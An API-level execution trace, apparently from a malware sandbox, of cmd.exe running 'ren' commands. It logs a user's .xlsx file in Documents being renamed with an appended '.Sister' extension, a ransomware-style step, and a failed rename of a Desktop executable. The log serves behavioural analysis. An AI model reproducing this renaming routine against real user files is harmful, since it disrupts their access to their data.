[0305.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.059] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x29) returned 1 [0305.060] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0305.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.060] GetFileType (hFile=0x50) returned 0x2 [0305.060] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.060] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0305.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.061] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0305.067] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0305.068] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0305.068] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0305.068] malloc (_Size=0xffce) returned 0x21eda23fd80 [0305.068] ??_V@YAXPEAX@Z () returned 0x21eda23fd80 [0305.068] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0305.068] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0305.068] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0305.068] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0305.068] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0305.068] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0305.068] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0305.068] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0305.068] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0305.068] ??_V@YAXPEAX@Z () returned 0x1 [0305.069] GetProcessHeap () returned 0x21ed8c70000 [0305.069] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb8) returned 0x21ed93b64b0 [0305.069] GetProcessHeap () returned 0x21ed8c70000 [0305.069] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b64b0, Size=0x64) returned 0x21ed8d64260 [0305.069] GetProcessHeap () returned 0x21ed8c70000 [0305.069] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d64260) returned 0x64 [0305.069] GetProcessHeap () returned 0x21ed8c70000 [0305.069] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x6c) returned 0x21ed8d67a30 [0305.069] GetProcessHeap () returned 0x21ed8c70000 [0305.069] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb8) returned 0x21ed93b54f0 [0305.069] GetProcessHeap () returned 0x21ed8c70000 [0305.069] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b54f0, Size=0x64) returned 0x21ed8d642d0 [0305.069] GetProcessHeap () returned 0x21ed8c70000 [0305.069] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d642d0) returned 0x64 [0305.069] malloc (_Size=0xffce) returned 0x21eda23fd80 [0305.069] ??_V@YAXPEAX@Z () returned 0x21eda23fd80 [0305.070] GetProcessHeap () returned 0x21ed8c70000 [0305.070] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc79c0 [0305.070] GetProcessHeap () returned 0x21ed8c70000 [0305.070] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5b630 [0305.070] _wcsicmp (_String1="O-Jp_px2B.xlsx", _String2=".") returned 65 [0305.070] _wcsicmp (_String1="O-Jp_px2B.xlsx", _String2="..") returned 65 [0305.070] GetFileAttributesW (lpFileName="O-Jp_px2B.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\o-jp_px2b.xlsx")) returned 0x20 [0305.070] GetProcessHeap () returned 0x21ed8c70000 [0305.071] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed930fff0 [0305.072] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9310000 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.072] SetErrorMode (uMode=0x0) returned 0x0 [0305.072] SetErrorMode (uMode=0x1) returned 0x0 [0305.072] GetFullPathNameW (in: lpFileName="O-Jp_px2B.xlsx", nBufferLength=0x7fe7, lpBuffer=0x21eda23fd80, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\O-Jp_px2B.xlsx", lpFilePart=0xa6cf4fd660*="O-Jp_px2B.xlsx") returned 0x28 [0305.072] SetErrorMode (uMode=0x0) returned 0x1 [0305.072] GetProcessHeap () returned 0x21ed8c70000 [0305.072] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5b8a0 [0305.072] _wcsicmp (_String1="O-Jp_px2B.xlsx", _String2=".") returned 65 [0305.072] _wcsicmp (_String1="O-Jp_px2B.xlsx", _String2="..") returned 65 [0305.072] GetFileAttributesW (lpFileName="O-Jp_px2B.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\o-jp_px2b.xlsx")) returned 0x20 [0305.073] ??_V@YAXPEAX@Z () returned 0x1 [0305.073] malloc (_Size=0xffce) returned 0x21eda23fd80 [0305.073] ??_V@YAXPEAX@Z () returned 0x21eda23fd80 [0305.073] malloc (_Size=0xffce) returned 0x21eda24fd60 [0305.073] ??_V@YAXPEAX@Z () returned 0x21eda24fd60 [0305.074] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\O-Jp_px2B.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\o-jp_px2b.xlsx")) returned 0x20 [0305.074] malloc (_Size=0xffce) returned 0x21ed993f900 [0305.074] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0305.074] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\O-Jp_px2B.xlsx", fInfoLevelId=0x1, lpFindFileData=0x21ed8d5b640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d5b640) returned 0x21ed8cc7ae0 [0305.074] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0305.074] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0305.074] ??_V@YAXPEAX@Z () returned 0x1 [0305.074] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\O-Jp_px2B.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\o-jp_px2b.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\O-Jp_px2B.xlsx.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\o-jp_px2b.xlsx.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0305.075] FindNextFileW (in: hFindFile=0x21ed8cc7ae0, lpFindFileData=0x21ed8d5b640 | out: lpFindFileData=0x21ed8d5b640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb445ea20, ftCreationTime.dwHighDateTime=0x1d5e0de, ftLastAccessTime.dwLowDateTime=0xfb24acd0, ftLastAccessTime.dwHighDateTime=0x1d587db, ftLastWriteTime.dwLowDateTime=0xfb24acd0, ftLastWriteTime.dwHighDateTime=0x1d587db, nFileSizeHigh=0x0, nFileSizeLow=0x1dea, dwReserved0=0x0, dwReserved1=0x0, cFileName="O-Jp_px2B.xlsx", cAlternateFileName="")) returned 0 [0305.077] GetLastError () returned 0x12 [0305.077] FindClose (in: hFindFile=0x21ed8cc7ae0 | out: hFindFile=0x21ed8cc7ae0) returned 1 [0305.077] ??_V@YAXPEAX@Z () returned 0x1 [0305.077] ??_V@YAXPEAX@Z () returned 0x1 [0305.077] ??_V@YAXPEAX@Z () returned 0x1 [0305.077] ??_V@YAXPEAX@Z () returned 0x1 [0305.077] GetProcessHeap () returned 0x21ed8c70000 [0305.077] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7de0 [0305.077] GetProcessHeap () returned 0x21ed8c70000 [0305.077] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95500, Size=0x16) returned 0x21ed8c957a0 [0305.077] GetProcessHeap () returned 0x21ed8c70000 [0305.077] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c957a0) returned 0x16 [0305.078] GetProcessHeap () returned 0x21ed8c70000 [0305.078] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45bc0, Size=0x20) returned 0x21ed8d45bf0 [0305.078] GetProcessHeap () returned 0x21ed8c70000 [0305.078] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45bf0) returned 0x20 [0305.078] GetProcessHeap () returned 0x21ed8c70000 [0305.078] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d61660 [0305.078] GetProcessHeap () returned 0x21ed8c70000 [0305.078] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61660, Size=0xb2) returned 0x21ed93b6270 [0305.078] GetProcessHeap () returned 0x21ed8c70000 [0305.078] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b6270) returned 0xb2 [0305.078] GetProcessHeap () returned 0x21ed8c70000 [0305.078] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2c120 [0305.078] GetProcessHeap () returned 0x21ed8c70000 [0305.078] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2c120, Size=0x30) returned 0x21ed8d2c120 [0305.078] GetProcessHeap () returned 0x21ed8c70000 [0305.078] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2c120) returned 0x30 [0305.078] GetProcessHeap () returned 0x21ed8c70000 [0305.078] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2c160 [0305.078] malloc (_Size=0x1ff9c) returned 0x21eda23fd80 [0305.079] GetProcessHeap () returned 0x21ed8c70000 [0305.079] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93b5070 [0305.079] GetProcessHeap () returned 0x21ed8c70000 [0305.079] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed93b5af0 [0305.079] ??_V@YAXPEAX@Z () returned 0x1 [0305.079] malloc (_Size=0x1ff9c) returned 0x21eda23fd80 [0305.079] GetProcessHeap () returned 0x21ed8c70000 [0305.079] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93b6570 [0305.080] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda23fd80, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0305.080] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7720 [0305.080] FindClose (in: hFindFile=0x21ed8cc7720 | out: hFindFile=0x21ed8cc7720) returned 1 [0305.080] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7f00 [0305.080] FindClose (in: hFindFile=0x21ed8cc7f00 | out: hFindFile=0x21ed8cc7f00) returned 1 [0305.080] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8cc7ae0 [0305.081] FindClose (in: hFindFile=0x21ed8cc7ae0 | out: hFindFile=0x21ed8cc7ae0) returned 1 [0305.081] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0305.081] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.081] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0305.081] GetProcessHeap () returned 0x21ed8c70000 [0305.081] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67030 [0305.081] ??_V@YAXPEAX@Z () returned 0x1 [0305.081] ??_V@YAXPEAX@Z () returned 0x1 [0305.081] GetProcessHeap () returned 0x21ed8c70000 [0305.081] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2c160, Size=0x490) returned 0x21ed8d2c160 [0305.081] GetProcessHeap () returned 0x21ed8c70000 [0305.081] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2c160) returned 0x490 [0305.082] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0305.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.082] GetFileType (hFile=0x50) returned 0x2 [0305.082] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.082] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0305.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.083] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0305.090] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.155] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0305.155] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0305.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.155] GetFileType (hFile=0x50) returned 0x2 [0305.155] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.155] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0305.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.156] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x1a) returned 1 [0305.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.157] GetFileType (hFile=0x50) returned 0x2 [0305.157] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.157] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0305.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.157] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d2c130*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d2c130*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0305.158] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0305.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.158] GetFileType (hFile=0x50) returned 0x2 [0305.158] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.158] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0305.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.158] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0305.166] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0305.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.166] GetFileType (hFile=0x50) returned 0x2 [0305.166] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.166] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0305.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.167] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0305.176] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0305.177] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0305.177] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0305.177] malloc (_Size=0xffce) returned 0x21eda23fd80 [0305.177] ??_V@YAXPEAX@Z () returned 0x21eda23fd80 [0305.177] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0305.177] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0305.177] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0305.177] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0305.177] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0305.178] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0305.178] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0305.178] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0305.178] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0305.178] ??_V@YAXPEAX@Z () returned 0x1 [0305.178] GetProcessHeap () returned 0x21ed8c70000 [0305.178] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5e8e0 [0305.178] GetProcessHeap () returned 0x21ed8c70000 [0305.178] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e8e0, Size=0x130) returned 0x21ed93b2d30 [0305.178] GetProcessHeap () returned 0x21ed8c70000 [0305.178] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b2d30) returned 0x130 [0305.178] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0305.178] malloc (_Size=0xffce) returned 0x21eda23fd80 [0305.178] ??_V@YAXPEAX@Z () returned 0x21eda23fd80 [0305.178] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0305.179] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda23fd80, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0305.180] ??_V@YAXPEAX@Z () returned 0x1 [0305.180] GetProcessHeap () returned 0x21ed8c70000 [0305.180] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed93b1a70 [0305.181] GetProcessHeap () returned 0x21ed8c70000 [0305.181] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5e8e0 [0305.181] GetProcessHeap () returned 0x21ed8c70000 [0305.181] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e8e0, Size=0x130) returned 0x21ed93b2e70 [0305.181] GetProcessHeap () returned 0x21ed8c70000 [0305.181] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b2e70) returned 0x130 [0305.181] malloc (_Size=0xffce) returned 0x21eda23fd80 [0305.181] ??_V@YAXPEAX@Z () returned 0x21eda23fd80 [0305.181] GetProcessHeap () returned 0x21ed8c70000 [0305.181] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7ae0 [0305.181] GetProcessHeap () returned 0x21ed8c70000 [0305.181] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d59680 [0305.181] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0305.182] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0305.182] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0305.182] GetLastError () returned 0x2 [0305.182] GetProcessHeap () returned 0x21ed8c70000 [0305.182] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed931ffe0 [0305.182] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed931fff0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.182] SetErrorMode (uMode=0x0) returned 0x0 [0305.182] SetErrorMode (uMode=0x1) returned 0x0 [0305.182] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda23fd80, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0305.182] SetErrorMode (uMode=0x0) returned 0x1 [0305.182] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0305.183] GetProcessHeap () returned 0x21ed8c70000 [0305.183] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5bff0 [0305.183] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0305.183] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0305.183] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0305.183] GetLastError () returned 0x2 [0305.183] ??_V@YAXPEAX@Z () returned 0x1 [0305.183] malloc (_Size=0xffce) returned 0x21eda23fd80 [0305.183] ??_V@YAXPEAX@Z () returned 0x21eda23fd80 [0305.183] malloc (_Size=0xffce) returned 0x21eda24fd60 [0305.183] ??_V@YAXPEAX@Z () returned 0x21eda24fd60 [0305.183] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0305.183] GetLastError () returned 0x2 [0305.183] _get_osfhandle (_FileHandle=2) returned 0x54 [0305.183] GetFileType (hFile=0x54) returned 0x2 [0305.183] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0305.184] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0305.185] _get_osfhandle (_FileHandle=2) returned 0x54 [0305.185] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0305.185] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0305.185] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0305.185] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0305.200] longjmp () [0305.200] ??_V@YAXPEAX@Z () returned 0x1 [0305.200] 